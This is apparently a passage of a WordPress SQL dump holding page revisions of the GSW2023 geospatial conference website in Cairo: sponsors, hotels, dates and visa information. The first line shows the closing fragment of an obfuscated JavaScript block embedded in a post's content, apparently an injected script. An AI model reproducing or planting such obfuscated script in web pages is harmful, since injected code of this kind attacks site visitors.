_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 16:27:08','2023-06-25 16:27:08','',3066,'https://gsw2023.com/?p=4827',0,'revision','',0),
(4828,4,'2023-06-25 16:27:38','2023-06-25 16:27:38','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"middle\" css=\".vc_custom_1687710454090{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" 